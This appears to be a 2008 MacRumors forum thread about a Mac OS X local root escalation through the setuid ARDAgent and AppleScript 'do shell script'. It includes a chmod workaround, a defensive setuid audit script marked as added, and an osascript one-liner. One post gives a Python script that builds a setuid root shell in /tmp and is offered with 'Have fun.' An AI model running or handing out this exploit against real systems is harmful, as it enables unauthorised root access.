Mac OS X Local root escalation vulnerability

Discussion in 'macOS' started by zorinlynx, Jun 18, 2008.

  1. zorinlynx macrumors 601

    Joined:
    May 31, 2007
    Location:
    Florida, USA
    #1
    From Slashdot:

    "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not."

    If you administrate Mac OS X systems in a lab environment where local users shouldn't be able to get root, this can affect you. Thankfully for most of us, the user must be logged in *locally* (into the window system) for this to work.

    A quick workaround is to remove the suid bit on the ARDAgent:

    sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

    This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
     
  2. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #2
    Local privilege escalation.

    Code:
    #!/usr/bin/python
    
    import commands
    payload="echo 'int main() { setuid(0); setgid(0); seteuid(0); system(\"/bin/sh -i\"); }' > /tmp/r00t.c"
    buildcmd="gcc /tmp/r00t.c -o /tmp/r00ted"
    escalate="osascript -e 'tell app \"ARDAgent\" to do shell script \"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'"
    print 'Building your shell', commands.getoutput(payload), commands.getoutput(buildcmd)
    print commands.getoutput(escalate)
    
    print "r00t is located at /tmp/r00ted"
    
    Have fun.
     
  3. cdlxxvi macrumors newbie

    Joined:
    Apr 30, 2008
    #3
    Don't worry, guys, knowing Apple's serious treatment of known vulnerabilities (Safari carpet bombing being the prime example), we can expect an update any year now :rolleyes:
     
  4. Phil A. Moderator

    Staff Member

    Joined:
    Apr 2, 2006
    Location:
    Shropshire, UK
    #4
    There is no way of defending this - it is a massive hole and Apple should hang their heads in shame. Why the hell does ARDAgent have the SUID bit set when it can run shell scripts?!
    It would be trivial to use this exploit to install a trojan with root privileges and without any secondary authentication, and the question has to be: are there any more of these hidden away in OS X?
    The Apple world just got a bit more dangerous...
     
  5. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #5
    I would consider all binaries that Apple has given SUID bits to suspect. They've proven that they can't be trusted with them.

     
  6. subaqua macrumors member

    Joined:
    Jan 15, 2008
    Location:
    Minneapolis
    #6
    I cannot reproduce this on my Leopard system:

    (spartan) ~ % osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
    23:47: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)

    (spartan) ~ % uname -a
    Darwin spartan.example.com 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386

    My copy of ARDAgent has the suid bit set but I don't appear to be vulnerable...

    (spartan) ~ % ls -l /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
    -rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent*


    I am logged into the desktop running the above commands from terminal app.

    Was this fixed in 10.5.1, 10.5.2, or 10.5.3 already?

    Dan
     
  7. priller macrumors regular

    Joined:
    Dec 15, 2007
    #7
    Still worked with 10.5.3 for me

    gamma:~ priller$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

    root
     
  8. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #8
    None of those are scriptable.
     
  9. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #9
    Who said that they needed to be scriptable? You've got your blinders on.
     
  10. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #10
    If Remote Desktop is enabled, ARDAgent will already be running as the local user; launchd ignores setuid.
     
  11. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #11
    The OP. Don't post what you don't understand.
     
  12. Random Chaos macrumors member

    Joined:
    Jan 16, 2008
    #12
    And as was said, fully exploitable via scripts. For instance, make a nicely trusted AppleScript, saved as an Application:

    Code:
    on run
    	do shell script "osascript -e 'tell app \"ARDAgent\" to do shell script \"say quack\"'"
    end run
    
    You'll notice that it says it with the default voice, not the one set for your account.

    So how long before we see malware or trojans?
     
  13. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #13
    You don't need to use osascript if you're already in an applescript!

    Code:
    on run
    	tell app "ARDAgent" to do shell script "say quack"
    end run
    
     
  14. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #14
  15. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #15
    If you have something useful to say about setuid binaries, post it.
     
  16. martychang macrumors regular

    Joined:
    Sep 3, 2007
    #18
    That MOAB 15 bug is scary stuff :eek:
    I read Rixstep regularly so I'm not entirely sure how I missed that.

    I want to love you Apple, but you make it so hard :(
     
  17. Iroganai macrumors regular

    Joined:
    Oct 18, 2003
    #19
    First, this should be posted on the top page of Macrumors.
    Second, to SC68CAL, "do shell script" is not really functionality of ARDAgent; it is there FOR ANY SCRIPTABLE APP as part of AppleScript-ability, and any GUI app which is registered with LaunchServices can be sent an AppleEvent.
    Apple is to blame for having AppleScript-ability in setuid apps. It's a gaping hole in security!

    In your list of setuid'ed executables, the only other GUI app is check_afp.app.
    But
    Code:
    osascript -e 'tell app "check_afp" to do shell script "whoami" '
    didn't "work" on my machine. Mmm ...
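A defender-side audit, added here as an example and not part of any post in this thread, covering both the list of setuid executables Iroganai refers to and the chmod u-s workaround from the OP: it lists setuid executables under the given directories, flags those living inside an .app bundle (the class that can be sent Apple Events), and reports whether ARDAgent's setuid bit is still cleared. The function names and return codes are my own choices; the ARDAgent path is the one quoted in the thread.

```shell
#!/bin/sh
# Audit setuid executables and flag those inside .app bundles, since any GUI
# app registered with LaunchServices can receive "do shell script" and a
# setuid one runs it as root.  Typical call on a stock install:
#   audit_setuid_apps /System/Library /usr /bin /sbin
# (example script, not from the thread; function names are assumptions)

audit_setuid_apps() {
    # One line per setuid file: "app" or "bin" tag followed by the path.
    find "$@" -type f -perm -4000 2>/dev/null | while IFS= read -r path; do
        case "$path" in
            *.app/Contents/MacOS/*) printf 'app %s\n' "$path" ;;
            *)                      printf 'bin %s\n' "$path" ;;
        esac
    done
}

# Number of setuid executables that sit inside an .app bundle (the risky class).
count_setuid_apps() {
    audit_setuid_apps "$@" | grep -c '^app ' || true
}

# Path quoted in the thread; an alternate path may be passed for testing.
ARDAGENT=/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

# Returns 0 if the setuid bit is clear (workaround in place), 1 if it is
# still set (repair permissions may have restored it), 2 if the file is absent.
check_ardagent() {
    f=${1:-$ARDAGENT}
    [ -e "$f" ] || { echo "missing: $f"; return 2; }
    if [ -u "$f" ]; then
        echo "setuid STILL SET on $f (re-apply: sudo chmod u-s \"$f\")"
        return 1
    fi
    echo "setuid cleared on $f"
    return 0
}
```

Run it after every Repair Permissions or software update, since the OP notes that the workaround can be undone by either.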
     
  18. lugesm macrumors 6502a

    Joined:
    Sep 7, 2007
    #20
    For a relative Mac newbie most of the above posts read like Greek. :confused:

    Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
     
  19. martychang macrumors regular

    Joined:
    Sep 3, 2007
    #21
    Not really. Any malware's first goal, trojan or otherwise, is to make sure nobody can see it. This is why Windows users have such problems, even when they run all kinds of security programs: you basically have to be familiar with what's supposed to be on the system, and spot things that look fishy.
     
